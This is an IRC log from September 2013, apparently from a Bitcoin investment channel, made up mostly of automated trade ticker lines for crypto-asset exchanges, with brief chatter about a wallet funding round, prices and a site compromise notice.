[ASICMINER-PT] 1 @ 2.1 BTC [+] Sep 16 08:14:00 [BTCTC] [LABCOIN] 1 @ 0.002774 BTC [+] Sep 16 08:27:03 [HAVELOCK] [XBOND] 1 @ 0.00118999 BTC [-] Sep 16 08:30:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.01929 BTC [+] Sep 16 08:31:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.01929 BTC [+] Sep 16 08:33:01 [MPEX] [S.MPOE] 6450 @ 0.00091829 = 5.923 BTC [+] Sep 16 08:33:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0193 BTC [+] Sep 16 08:33:03 [MPEX] [S.MPOE] 10000 @ 0.00092 = 9.2 BTC [+] Sep 16 08:36:26 [BTCTC] [LABCOIN] 40 @ 0.002602 = 0.1041 BTC [-] Sep 16 08:36:28 [BTCTC] [LABCOIN] 350 @ 0.002601 = 0.9104 BTC [-] Sep 16 08:36:29 [BTCTC] [LABCOIN] 1409 @ 0.0026 = 3.6634 BTC [-] Sep 16 08:36:29 [BTCTC] [LABCOIN] 1793 @ 0.0026 = 4.6618 BTC [-] Sep 16 08:39:20 [BTCTC] [DMS.MINING] 17 @ 0.00249 = 0.0423 BTC [+] Sep 16 08:40:30 [BTCTC] [DMS.SELLING] 10 @ 0.00706 = 0.0706 BTC [-] Sep 16 08:40:31 [BTCTC] [DMS.SELLING] 163 @ 0.007065 = 1.1516 BTC [+] Sep 16 08:40:33 [BTCTC] [DMS.SELLING] 302 @ 0.007066 = 2.1339 BTC [+] Sep 16 08:40:34 [BTCTC] [DMS.SELLING] 1150 @ 0.007067 = 8.1271 BTC [+] Sep 16 08:40:35 [BTCTC] [DMS.SELLING] 1 @ 0.00707 BTC [+] Sep 16 08:43:02 [BTCTC] [ASICMINER-PT] 1 @ 2.094 BTC [-] Sep 16 08:44:28 [BTCTC] [ASICMINER-PT] 1 @ 2.092 BTC [-] Sep 16 08:47:24 [BTCTC] [ASICMINER-PT] 2 @ 2.09 = 4.18 BTC [-] Sep 16 08:47:25 [BTCTC] [ASICMINER-PT] 1 @ 2.091 BTC [+] Sep 16 08:48:08 [BTCTC] [DMS.PURCHASE] 50 @ 0.009377 = 0.4689 BTC [+] Sep 16 08:49:07 [BTCTC] [BASIC-MINING] 1 @ 0.1083 BTC [+] Sep 16 08:49:29 [MPEX] [S.MPOE] 4350 @ 0.00092116 = 4.007 BTC [+] Sep 16 08:49:31 [MPEX] [S.MPOE] 11 @ 0.00091591 = 0.0101 BTC [-] Sep 16 08:49:38 [BTCTC] [BASIC-MINING] 4 @ 0.1084 = 0.4336 BTC [+] Sep 16 08:50:20 [BTCTC] [BASIC-MINING] 4 @ 0.1084 = 0.4336 BTC [+] Sep 16 08:51:48 WHOA HO Sep 16 08:51:51 [BTCTC] [BASIC-MINING] 3 @ 0.1084 = 0.3252 BTC [+] Sep 16 08:54:01 [BTCTC] [ASICMINER-PT] 1 @ 2.091 BTC [+] Sep 16 08:55:43 Tony Wild takes himself a little too seriously. Sep 16 09:01:49 who is Tony Wilde? Sep 16 09:09:04 http://www.marketwatch.com/story/most-secure-bitcoin-wallet-armory-raises-600k-led-by-trace-mayer-2013-09-16 Sep 16 09:09:07 Most Secure Bitcoin Wallet Armory Raises $600k Led by Trace Mayer - MarketWatch Sep 16 09:09:26 600k to dev a wallet? Sep 16 09:09:34 is this the trezor wallet? Sep 16 09:09:39 that steals all your data Sep 16 09:10:25 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] Sep 16 09:10:26 [BTCTC] [ASICMINER-PT] 1 @ 2.07 BTC [-] Sep 16 09:11:27 i love armory but i don't see how an investor would get any return off that.. Sep 16 09:12:13 smartphone armory maybe? Sep 16 09:22:32 [BTCTC] [ASICMINER-PT] 1 @ 2.091 BTC [+] Sep 16 09:26:51 [BTCTC] [TAT.MINIGAME] 3400 @ 0.0002228 = 0.7575 BTC [-] Sep 16 09:27:05 [BTCTC] [ASICMINER-PT] 1 @ 2.091 BTC [+] Sep 16 09:27:31 which explains why the round is so small. Sep 16 09:27:51 they're hoping they maybe come up with something. at least it's a known brand that's known for actually doing something. Sep 16 09:31:25 [BTCTC] [LABCOIN] 500 @ 0.0026 = 1.3 BTC [-] Sep 16 09:34:30 [BTCTC] [TAT.ASICMINER] 37 @ 0.01868 = 0.6912 BTC [-] Sep 16 09:34:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.01866 = 0.056 BTC [-] Sep 16 09:34:41 [BTCTC] [ASICMINER-PT] 1 @ 2.076 BTC [-] Sep 16 09:35:39 [BTCTC] [LABCOIN] 5 @ 0.002599 = 0.013 BTC [-] Sep 16 09:36:10 [BTCTC] [ASICMINER-PT] 4 @ 2.075 = 8.3 BTC [-] Sep 16 09:37:48 ah i suppose you're right. i'm not used to thinking of .6mil as a small amount Sep 16 09:38:24 from vc perspective though.. Sep 16 09:39:06 .6 is not even a round lol. i don't even know anyone who'd sign for less than about 5mn by now. Sep 16 09:39:09 just not worth their time. Sep 16 09:43:07 ;;nethash Sep 16 09:43:08 999860.606024 Sep 16 09:43:12 lol Sep 16 09:43:51 :] Sep 16 09:44:36 haha Sep 16 09:44:54 Neil are you in that 1mn bet on bitbet ? Sep 16 09:48:03 [BTCTC] [LABCOIN] 6123 @ 0.002591 = 15.8647 BTC [-] Sep 16 09:48:46 [BTCTC] [DMS.PURCHASE] 42 @ 0.009377 = 0.3938 BTC [+] Sep 16 09:49:33 [BTCTC] [TAT.MINIGAME] 6600 @ 0.0002225 = 1.4685 BTC [-] Sep 16 09:50:01 mircea_popescu: Indeed. Sep 16 09:50:13 it's toying with ye. Sep 16 09:50:25 Is gribble 72h ave. or sthg? Sep 16 09:50:32 It seems to lag other sources. Sep 16 09:52:27 [MPEX] [S.MPOE] 8850 @ 0.00090794 = 8.0353 BTC [-] Sep 16 09:54:58 i dun think so Sep 16 09:58:15 [BTCTC] [LABCOIN] 750 @ 0.002599 = 1.9493 BTC [+] Sep 16 10:03:13 [BTCTC] [DMS.MINING] 10 @ 0.002308 = 0.0231 BTC [-] Sep 16 10:03:15 [BTCTC] [DMS.MINING] 7 @ 0.002307 = 0.0161 BTC [-] Sep 16 10:03:16 [BTCTC] [DMS.MINING] 20 @ 0.002299 = 0.046 BTC [-] Sep 16 10:03:17 [BTCTC] [DMS.MINING] 63 @ 0.002295 = 0.1446 BTC [-] Sep 16 10:03:42 [BTCTC] [LTC-ATF.B2] 9 @ 0.0106 = 0.0954 BTC [-] Sep 16 10:05:35 [BTCTC] [DMS.MINING] 1 @ 0.002411 BTC [+] **** BEGIN LOGGING AT Mon Sep 16 17:43:57 2013 Sep 16 17:43:59 [BTCTC] [LABCOIN] 400 @ 0.0027 = 1.08 BTC [+] Sep 16 17:44:34 [BTCTC] [BTC-GROWTH] 27 @ 0.1009 = 2.7243 BTC [+] Sep 16 17:44:35 [BTCTC] [BTC-GROWTH] 43 @ 0.1009 = 4.3387 BTC [+] Sep 16 17:46:03 [BTCTC] [LABCOIN] 10 @ 0.0027 = 0.027 BTC [+] Sep 16 17:47:27 [BTCTC] [CIPHERMINE.B1] 61 @ 0.01039 = 0.6338 BTC [+] Sep 16 17:52:43 [BTCTC] [LABCOIN] 80 @ 0.002699 = 0.2159 BTC [-] Sep 16 17:54:06 http://cuteoverload.files.wordpress.com/2013/09/9454308634_017544d3c4_z.jpg Sep 16 17:56:04 [BTCTC] [KENILWORTH] 10 @ 0.0017 = 0.017 BTC [-] Sep 16 17:56:31 [BTCTC] [KENILWORTH] 39 @ 0.001748 = 0.0682 BTC [+] Sep 16 17:57:06 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000616 = 0.0018 BTC [-] Sep 16 17:57:15 [BTCTC] [KENILWORTH] 3 @ 0.001749 = 0.0052 BTC [+] Sep 16 17:59:54 [BTCTC] [DMS.MINING] 43 @ 0.002496 = 0.1073 BTC [+] Sep 16 18:01:23 [HAVELOCK] [XBOND] 3350 @ 0.001195 = 4.0033 BTC [+] Sep 16 18:02:27 [HAVELOCK] [DEALCO] 17 @ 0.009 = 0.153 BTC [+] Sep 16 18:02:35 [BTCTC] [DMS.MINING] 100 @ 0.002496 = 0.2496 BTC [+] Sep 16 18:03:47 [HAVELOCK] [DEALCO] 2 @ 0.009 = 0.018 BTC [+] Sep 16 18:03:54 [HAVELOCK] [DEALCO] 8 @ 0.0099999 = 0.08 BTC [+] Sep 16 18:04:18 [BTCTC] [DMS.PURCHASE] 10 @ 0.009377 = 0.0938 BTC [+] Sep 16 18:05:20 [BTCTC] [ACTIVEMINING] 1 @ 0.002681 BTC [+] Sep 16 18:06:50 [HAVELOCK] [CBTC] 5000 @ 0.000395 = 1.975 BTC [-] Sep 16 18:06:53 [HAVELOCK] [CBTC] 10000 @ 0.000393 = 3.93 BTC [-] Sep 16 18:06:55 [HAVELOCK] [CBTC] 1 @ 0.00039204 BTC [-] Sep 16 18:06:57 [HAVELOCK] [CBTC] 533 @ 0.00039203 = 0.209 BTC [-] Sep 16 18:06:59 [HAVELOCK] [CBTC] 1000 @ 0.00039 = 0.39 BTC [-] Sep 16 18:07:02 [HAVELOCK] [CBTC] 18466 @ 0.00039 = 7.2017 BTC [-] Sep 16 18:07:04 [HAVELOCK] [DEALCO] 5 @ 0.00999999 = 0.05 BTC [+] Sep 16 18:07:06 [BTCTC] [ACTIVEMINING] 417 @ 0.002677 = 1.1163 BTC [-] Sep 16 18:07:07 [BTCTC] [ACTIVEMINING] 83 @ 0.00268 = 0.2224 BTC [+] Sep 16 18:07:08 [HAVELOCK] [SDSTM] 4 @ 0.00249999 = 0.01 BTC [+] Sep 16 18:09:23 [BTCTC] [LABCOIN] 2 @ 0.002597 = 0.0052 BTC [-] Sep 16 18:11:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.01946 = 0.1362 BTC [+] Sep 16 18:11:30 [BTCTC] [ACTIVEMINING] 200 @ 0.00268 = 0.536 BTC [+] Sep 16 18:15:00 [BTCTC] [BASIC-MINING] 1 @ 0.1098 BTC [+] Sep 16 18:15:01 [BTCTC] [BASIC-MINING] 3 @ 0.1099 = 0.3297 BTC [+] Sep 16 18:15:01 [BTCTC] [ACTIVEMINING] 100 @ 0.00268 = 0.268 BTC [+] Sep 16 18:18:16 [BTCTC] [LABCOIN] 25 @ 0.002683 = 0.0671 BTC [+] Sep 16 18:19:17 ;;ticker Sep 16 18:19:17 MtGox BTCUSD ticker | Best bid: 138.76503, Best ask: 139.49997, Bid-ask spread: 0.73494, Last trade: 138.76503, 24 hour volume: 8175.41457116, 24 hour low: 137.85000, 24 hour high: 142.23000, 24 hour vwap: 139.77612 Sep 16 18:19:34 i think the withdrawal holdups Sep 16 18:20:25 [BTCTC] [LABCOIN] 25 @ 0.002639 = 0.066 BTC [-] Sep 16 18:21:09 [BTCTC] [LABCOIN] 182 @ 0.002605 = 0.4741 BTC [-] Sep 16 18:21:46 [BTCTC] [ASICMINER-PT] 1 @ 2.099 BTC [+] Sep 16 18:22:10 [HAVELOCK] [XBOND] 3651 @ 0.001195 = 4.3629 BTC [+] Sep 16 18:22:30 [HAVELOCK] [XBOND] 450 @ 0.0012 = 0.54 BTC [+] Sep 16 18:22:33 [BTCTC] [TAT.ASICMINER] 31 @ 0.01946 = 0.6033 BTC [+] Sep 16 18:22:40 [HAVELOCK] [XBOND] 400 @ 0.0012 = 0.48 BTC [+] Sep 16 18:22:42 [HAVELOCK] [XBOND] 3 @ 0.0012 = 0.0036 BTC [+] Sep 16 18:22:45 [HAVELOCK] [XBOND] 100 @ 0.0012 = 0.12 BTC [+] Sep 16 18:23:16 [BTCTC] [LABCOIN] 18 @ 0.002606 = 0.0469 BTC [+] Sep 16 18:23:26 [BTCTC] [LABCOIN] 164 @ 0.002605 = 0.4272 BTC [-] Sep 16 18:23:41 [HAVELOCK] [XBOND] 2 @ 0.00122 = 0.0024 BTC [+] Sep 16 18:25:04 [BTCTC] [LABCOIN] 164 @ 0.002605 = 0.4272 BTC [-] Sep 16 18:26:53 [BTCTC] [LABCOIN] 25 @ 0.00264 = 0.066 BTC [+] Sep 16 18:26:54 [BTCTC] [LABCOIN] 124 @ 0.002612 = 0.3239 BTC [-] Sep 16 18:26:56 [BTCTC] [LABCOIN] 23 @ 0.00261 = 0.06 BTC [-] Sep 16 18:28:06 [HAVELOCK] [XBOND] 2 @ 0.001234 = 0.0025 BTC [+] Sep 16 18:28:08 [HAVELOCK] [XBOND] 2150 @ 0.00124 = 2.666 BTC [+] Sep 16 18:28:49 [BTCTC] [LABCOIN] 100 @ 0.002617 = 0.2617 BTC [+] Sep 16 18:30:55 [HAVELOCK] [HIM] 5 @ 0.16299999 = 0.815 BTC [+] Sep 16 18:33:19 [BTCTC] [ASICMINER-PT] 1 @ 2.104 BTC [+] Sep 16 18:35:00 [BTCTC] [ASICMINER-PT] 7 @ 2.104 = 14.728 BTC [+] Sep 16 18:35:02 [BTCTC] [ASICMINER-PT] 1 @ 2.06 BTC [-] Sep 16 18:35:03 [BTCTC] [ASICMINER-PT] 1 @ 2.038 BTC [-] Sep 16 18:35:04 [BTCTC] [ASICMINER-PT] 1 @ 2.037 BTC [-] Sep 16 18:35:05 [BTCTC] [ASICMINER-PT] 2 @ 2.036 = 4.072 BTC [-] Sep 16 18:35:07 [BTCTC] [ASICMINER-PT] 1 @ 2.036 BTC [-] Sep 16 18:35:08 [BTCTC] [ASICMINER-PT] 1 @ 2.035 BTC [-] Sep 16 18:35:09 [BTCTC] [ASICMINER-PT] 1 @ 2.034 BTC [-] Sep 16 18:35:09 [BTCTC] [ASICMINER-PT] 1 @ 2.033 BTC [-] Sep 16 18:38:35 [BTCTC] [ACTIVEMINING] 1499 @ 0.002649 = 3.9709 BTC [-] Sep 16 18:41:03 [HAVELOCK] [XBOND] 1 @ 0.00124049 BTC [+] Sep 16 18:42:15 [HAVELOCK] [CBTC] 1 @ 0.00042399 BTC [+] Sep 16 18:43:32 thestringpuller http://trilema.com/2013/america-and-intellectual-relevance/#comment-95085 Sep 16 18:43:36 there. does that complete your set ? Sep 16 18:47:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.0194 = 0.0388 BTC [-] Sep 16 18:47:27 [BTCTC] [DMS.MINING] 100 @ 0.002405 = 0.2405 BTC [-] Sep 16 18:50:57 [BTCTC] [DMS.SELLING] 350 @ 0.006999 = 2.4497 BTC [-] Sep 16 18:50:58 [BTCTC] [DMS.SELLING] 250 @ 0.007 = 1.75 BTC [+] Sep 16 18:51:38 [MPEX] [S.MPOE] 7895 @ 0.00090755 = 7.1651 BTC [+] Sep 16 18:51:39 [MPEX] [S.MPOE] 12150 @ 0.00090885 = 11.0425 BTC [+] Sep 16 18:51:49 [MPEX] [S.MPOE] 8197 @ 0.00091007 = 7.4598 BTC [+] Sep 16 18:54:24 [BTCTC] [LABCOIN] 25 @ 0.002631 = 0.0658 BTC [+] Sep 16 18:54:26 [BTCTC] [LABCOIN] 9 @ 0.002617 = 0.0236 BTC [-] Sep 16 18:54:27 [BTCTC] [LABCOIN] 1095 @ 0.002616 = 2.8645 BTC [-] Sep 16 18:54:28 [BTCTC] [LABCOIN] 60 @ 0.002615 = 0.1569 BTC [-] Sep 16 18:54:28 [BTCTC] [LABCOIN] 427 @ 0.00261 = 1.1145 BTC [-] Sep 16 18:54:30 [BTCTC] [LABCOIN] 1100 @ 0.002603 = 2.8633 BTC [-] Sep 16 18:54:31 [BTCTC] [LABCOIN] 100 @ 0.002601 = 0.2601 BTC [-] Sep 16 18:54:32 [BTCTC] [LABCOIN] 184 @ 0.002601 = 0.4786 BTC [-] Sep 16 18:55:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.01933 = 0.058 BTC [-] Sep 16 18:55:34 [BTCTC] [TAT.ASICMINER] 37 @ 0.01893 = 0.7004 BTC [-] Sep 16 18:55:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.01891 = 0.1324 BTC [-] Sep 16 18:55:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.01889 = 0.0756 BTC [-] Sep 16 18:55:37 [BTCTC] [TAT.ASICMINER] 22 @ 0.01888 = 0.4154 BTC [-] Sep 16 18:55:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.01878 = 0.0751 BTC [-] Sep 16 18:55:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.01877 = 0.1877 BTC [-] Sep 16 18:55:40 [BTCTC] [TAT.ASICMINER] 13 @ 0.01876 = 0.2439 BTC [-] Sep 16 18:59:00 [BTCTC] [CIPHERMINE.B1] 200 @ 0.01031 = 2.062 BTC [-] Sep 16 18:59:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.01934 BTC [+] Sep 16 19:00:50 [HAVELOCK] [XBOND] 2 @ 0.00122029 = 0.0024 BTC [-] Sep 16 19:01:04 [HAVELOCK] [XBOND] 500 @ 0.0012202 = 0.6101 BTC [-] **** ENDING LOGGING AT Mon Sep 16 19:19:16 2013 **** BEGIN LOGGING AT Mon Sep 16 19:19:43 2013 Sep 16 19:20:03 [BTCTC] [ASICMINER-PT] 1 @ 2.092 BTC [+] Sep 16 19:20:29 [BTCTC] [DMS.MINING] 10 @ 0.002495 = 0.025 BTC [+] Sep 16 19:20:30 [BTCTC] [DMS.MINING] 1 @ 0.002495 BTC [+] Sep 16 19:20:46 [BTCTC] [DMS.MINING] 10 @ 0.002495 = 0.025 BTC [+] Sep 16 19:22:11 [HAVELOCK] [XBOND] 10 @ 0.00122001 = 0.0122 BTC [-] Sep 16 19:22:14 [HAVELOCK] [XBOND] 5 @ 0.00122 = 0.0061 BTC [-] Sep 16 19:22:16 [HAVELOCK] [XBOND] 100 @ 0.0012 = 0.12 BTC [-] Sep 16 19:22:37 [BTCTC] [ASICMINER-PT] 2 @ 2.102 = 4.204 BTC [+] Sep 16 19:27:46 [BTCTC] [LABCOIN] 459 @ 0.0027 = 1.2393 BTC [-] Sep 16 19:36:03 [HAVELOCK] [XBOND] 14 @ 0.001196 = 0.0167 BTC [-] Sep 16 19:41:36 [MPEX] [S.MPOE] 11100 @ 0.00090249 = 10.0176 BTC [-] Sep 16 19:47:32 [HAVELOCK] [XBOND] 1 @ 0.001196 BTC [-] Sep 16 19:48:31 [HAVELOCK] [XBOND] 999 @ 0.0012 = 1.1988 BTC [+] Sep 16 19:51:02 [BTCTC] [ACTIVEMINING] 118 @ 0.002689 = 0.3173 BTC [+] Sep 16 19:51:04 [BTCTC] [ACTIVEMINING] 100 @ 0.00269 = 0.269 BTC [+] Sep 16 19:51:25 [BTCTC] [DMS.MINING] 4 @ 0.002496 = 0.01 BTC [+] Sep 16 19:52:30 [BTCTC] [NASTY-PT] 3 @ 0.0018 = 0.0054 BTC [-] Sep 16 19:52:31 [BTCTC] [NASTY-PT] 1 @ 0.001786 BTC [-] Sep 16 19:54:53 [BTCTC] [DMS.MINING] 6 @ 0.002496 = 0.015 BTC [+] Sep 16 20:06:18 well this is fun Sep 16 20:06:19 https://bitcointalk.org/index.php?topic=293890.0;topicseen Sep 16 20:06:25 tkone is a cheater Sep 16 20:07:03 [BTCTC] [LABCOIN] 80 @ 0.0027 = 0.216 BTC [-] Sep 16 20:15:28 [HAVELOCK] [XBOND] 6 @ 0.00123999 = 0.0074 BTC [+] Sep 16 20:15:59 https://bitcointalk.org/index.php?topic=295414.msg3166914#msg3166914 Sep 16 20:16:02 SealsWithClubs.eu Servers Likely Compromised Change all your passwords! Sep 16 20:16:08 [MPEX] [S.MPOE] 6053 @ 0.0009025 = 5.4628 BTC [+] Sep 16 20:16:32 [BTCTC] [DMS.MINING] 2 @ 0.002496 = 0.005 BTC [+] Sep 16 20:17:31 [HAVELOCK] [XBOND] 6 @ 0.00123999 = 0.0074 BTC [+] :( Sep 16 20:17:48 you like it, admit it! Sep 16 20:17:52 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000616 = 0.0012 BTC [-] Sep 16 20:17:56 no i do not Sep 16 20:18:09 just more customer service work... Sep 16 20:19:27 [HAVELOCK] [AM100] 9 @ 0.02009 = 0.1808 BTC [-] Sep 16 20:19:36 [HAVELOCK] [DEALCO] 1 @ 0.00999999 BTC [+] Sep 16 20:19:45 [HAVELOCK] [LABCO] 1 @ 0.00288 BTC [+] Sep 16 20:20:07 [HAVELOCK] [SMG] 4 @ 0.0002162 = 0.0009 BTC [+] Sep 16 20:30:38 [HAVELOCK] [XBOND] 1 @ 0.0012398 BTC [-] Sep 16 20:32:18 hey TAT, finished ur popcorn yet? Sep 16 20:32:18 [BTCTC] [RSM] 1 @ 0.0095 BTC [+] Sep 16 20:32:22 :) Sep 16 20:34:08 This is a first for Havelock to have a higher price than BTCT for labcoin Sep 16 20:36:21 [HAVELOCK] [AM100] 1 @ 0.02009 BTC [-] Sep 16 20:37:01 [BTCTC] [DMS.MINING] 1 @ 0.002463 BTC [-] Sep 16 20:38:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000616 = 0.0012 BTC [-] Sep 16 20:46:20 [BTCTC] [ACTIVEMINING] 5 @ 0.002601 = 0.013 BTC [-] Sep 16 20:49:02 hey TAT, finished ur popcorn yet? <<<< This is bitcoin. Should probably buy stock in Orville Redenbacher by now! Sep 16 20:49:33 [HAVELOCK] [AM100] 4 @ 0.02009 = 0.0804 BTC [-] Sep 16 20:50:16 hehe Sep 16 20:51:29 [BTCTC] [LABCOIN] 23 @ 0.002725 = 0.0627 BTC [+] Sep 16 20:51:30 [BTCTC] [LABCOIN] 23 @ 0.002725 = 0.0627 BTC [+] Sep 16 20:51:32 [BTCTC] [LABCOIN] 9 @ 0.002725 = 0.0245 BTC [+] Sep 16 20:51:48 amazing popcorn Sep 16 20:51:48 AMAZING COMPANY! Sep 16 20:51:51 :) Sep 16 20:52:06 hahahahaha brilliant! Sep 16 20:58:09 popcorn?! i love popcorn! Sep 16 21:00:03 [BTCTC] [LABCOIN] 5 @ 0.002723 = 0.0136 BTC [-] Sep 16 21:00:39 [HAVELOCK] [CBTC] 65 @ 0.00042399 = 0.0276 BTC [+] Sep 16 21:05:59 [BTCTC] [DMS.PURCHASE] 170 @ 0.009365 = 1.5921 BTC [-] Sep 16 21:09:01 [HAVELOCK] [CBTC] 85 @ 0.000424 = 0.036 BTC [+] Sep 16 21:13:00 [BTCTC] [ACTIVEMINING] 5 @ 0.002601 = 0.013 BTC [-] Sep 16 21:13:47 [BTCTC] [ACTIVEMINING] 10 @ 0.0026 = 0.026 BTC [-] Sep 16 21:14:17 [BTCTC] [ACTIVEMINING] 10 @ 0.0026 = 0.026 BTC [-] Sep 16 21:16:57 [BTCTC] [LABCOIN] 13 @ 0.002725 = 0.0354 BTC [+] Sep 16 21:16:58 [BTCTC] [LABCOIN] 1 @ 0.002725 BTC [+] Sep 16 21:18:46 [BTCTC] [BASIC-MINING] 2 @ 0.1099 = 0.2198 BTC [+] Sep 16 21:19:05 [BTCTC] [LABCOIN] 23 @ 0.002702 = 0.0621 BTC [-] Sep 16 21:19:06 [BTCTC] [LABCOIN] 22 @ 0.002702 = 0.0594 BTC [-] Sep 16 21:19:08 [BTCTC] [LABCOIN] 20 @ 0.002702 = 0.054 BTC [-] Sep 16 21:19:09 [BTCTC] [LABCOIN] 17 @ 0.002702 = 0.0459 BTC [-] Sep 16 21:19:10 [BTCTC] [LABCOIN] 16 @ 0.002702 = 0.0432 BTC [-] Sep 16 21:19:11 [BTCTC] [LABCOIN] 15 @ 0.002702 = 0.0405 BTC [-] Sep 16 21:19:12 [BTCTC] [LABCOIN] 8 @ 0.002701 = 0.0216 BTC [-] Sep 16 21:21:33 [BTCTC] [LABCOIN] 5 @ 0.002701 = 0.0135 BTC [-] Sep 16 21:23:05 [BTCTC] [ACTIVEMINING] 40 @ 0.002559 = 0.1024 BTC [-] Sep 16 21:26:33 [BTCTC] [LABCOIN] 19 @ 0.002725 = 0.0518 BTC [+] Sep 16 21:26:34 [BTCTC] [LABCOIN] 17 @ 0.002725 = 0.0463 BTC [+] Sep 16 21:26:35 [BTCTC] [LABCOIN] 1 @ 0.002725 BTC [+] Sep 16 21:27:00 [HAVELOCK] [XBOND] 850 @ 0.00123979 = 1.0538 BTC [-] Sep 16 21:34:57 [BTCTC] [KENILWORTH] 7 @ 0.001749 = 0.0122 BTC [+] Sep 16 21:34:59 [BTCTC] [KENILWORTH] 200 @ 0.001749 = 0.3498 BTC [+] Sep 16 21:35:00 [BTCTC] [KENILWORTH] 1 @ 0.001749 BTC [+] Sep 16 21:37:06 [BTCTC] [DMS.MINING] 10 @ 0.002463 = 0.0246 BTC [-] Sep 16 21:38:06 [BTCTC] [DMS.PURCHASE] 15 @ 0.009365 = 0.1405 BTC [-] Sep 16 21:38:17 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.000615 = 0.0031 BTC [-] Sep 16 21:40:19 [BTCTC] [DMS.PURCHASE] 1 @ 0.009365 BTC [-] Sep 16 21:41:05 [BTCTC] [ACTIVEMINING] 13 @ 0.002697 = 0.0351 BTC [+] Sep 16 21:41:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.01921 = 0.0384 BTC [-] Sep 16 21:42:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.01921 = 0.0384 BTC [-] Sep 16 21:42:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.01922 = 0.0384 BTC [+] Sep 16 21:44:37 [HAVELOCK] [XBOND] 600 @ 0.0012 = 0.72 BTC [-] Sep 16 21:45:33 [HAVELOCK] [HIM] 10 @ 0.158 = 1.58 BTC [-] Sep 16 21:45:36 [HAVELOCK] [HIM] 60 @ 0.1575 = 9.45 BTC [-] Sep 16 21:45:37 [HAVELOCK] [HIM] 10 @ 0.157 = 1.57 BTC [-] Sep 16 21:45:40 [MPEX] [S.MPOE] 14000 @ 0.00090821 = 12.7149 BTC [+] Sep 16 21:48:52 [BTCTC] [RSM] 1 @ 0.007001 BTC [-] Sep 16 21:48:54 [BTCTC] [RSM] 1 @ 0.007 BTC [-] Sep 16 21:48:55 [BTCTC] [RSM] 43 @ 0.006701 = 0.2881 BTC [-] Sep 16 21:50:59 [BTCTC] [ASICMINER-PT] 1 @ 2.042 BTC [-] Sep 16 21:51:17 [HAVELOCK] [CBTC] 2375 @ 0.000424 = 1.007 BTC [+] Sep 16 21:51:36 [HAVELOCK] [AM100] 5 @ 0.01999 = 0.1 BTC [-] Sep 16 21:51:57 [BTCTC] [DMS.SELLING] 40 @ 0.007 = 0.28 BTC [+] Sep 16 21:53:34 [MPEX] [S.MPOE] 2300 @ 0.00090821 = 2.0889 BTC [+] Sep 16 21:53:36 [MPEX] [S.MPOE] 8100 @ 0.00091007 = 7.3716 BTC [+] Sep 16 22:03:37 [HAVELOCK] [SMG] 6 @ 0.0002162 = 0.0013 BTC [+] Sep 16 22:08:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000616 BTC [+] Sep 16 22:08:34 [HAVELOCK] [XBOND] 420 @ 0.0012 = 0.504 BTC [-] Sep 16 22:09:45 [HAVELOCK] [XBOND] 3747 @ 0.0012 = 4.4964 BTC [-] Sep 16 22:10:06 [HAVELOCK] [XBOND] 280 @ 0.0012 = 0.336 BTC [-] Sep 16 22:12:05 [HAVELOCK] [CBTC] 6590 @ 0.000424 = 2.7942 BTC [+] Sep 16 22:12:17 [HAVELOCK] [CBTC] 500 @ 0.000425 = 0.2125 BTC [+] Sep 16 22:12:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000571 BTC [-] Sep 16 22:13:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000615 BTC [+] Sep 16 22:14:58 [HAVELOCK] [CBTC] 1000 @ 0.0004344 = 0.4344 BTC [+] Sep 16 22:15:01 [BTCTC] [DMS.MINING] 4 @ 0.002496 = 0.01 BTC [+] Sep 16 22:17:31 [BTCTC] [ACTIVEMINING] 49 @ 0.00257 = 0.1259 BTC [-] Sep 16 22:17:33 [BTCTC] [ACTIVEMINING] 1 @ 0.002565 BTC [-] Sep 16 22:17:34 [BTCTC] [ACTIVEMINING] 199 @ 0.002557 = 0.5088 BTC [-] Sep 16 22:17:35 [BTCTC] [ACTIVEMINING] 137 @ 0.002553 = 0.3498 BTC [-] Sep 16 22:17:37 [BTCTC] [ACTIVEMINING] 551 @ 0.002552 = 1.4062 BTC [-] Sep 16 22:17:38 [BTCTC] [ACTIVEMINING] 25 @ 0.002533 = 0.0633 BTC [-] Sep 16 22:17:39 [BTCTC] [ACTIVEMINING] 100 @ 0.002532 = 0.2532 BTC [-] Sep 16 22:17:39 [BTCTC] [ACTIVEMINING] 43 @ 0.002511 = 0.108 BTC [-] Sep 16 22:17:40 [BTCTC] [ACTIVEMINING] 175 @ 0.00251 = 0.4393 BTC [-] Sep 16 22:17:41 [BTCTC] [ACTIVEMINING] 214 @ 0.002509 = 0.5369 BTC [-] Sep 16 22:18:52 [BTCTC] [S.BBET-PT] 1 @ 0.001298 BTC [+] Sep 16 22:19:23 [HAVELOCK] [XBOND] 598 @ 0.0012 = 0.7176 BTC [-] Sep 16 22:20:08 [HAVELOCK] [XBOND] 1000 @ 0.0012 = 1.2 BTC [-] Sep 16 22:22:52 [HAVELOCK] [XBOND] 2000 @ 0.0012 = 2.4 BTC [-] Sep 16 22:24:15 [HAVELOCK] [XBOND] 1032 @ 0.0012 = 1.2384 BTC [-] Sep 16 22:26:36 [HAVELOCK] [HIM] 15 @ 0.16299999 = 2.445 BTC [+] Sep 16 22:27:47 [HAVELOCK] [HIM] 60 @ 0.16299999 = 9.78 BTC [+] Sep 16 22:27:50 [HAVELOCK] [HIM] 40 @ 0.163 = 6.52 BTC [+] Sep 16 22:35:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.01941 = 0.0388 BTC [+] Sep 16 22:36:56 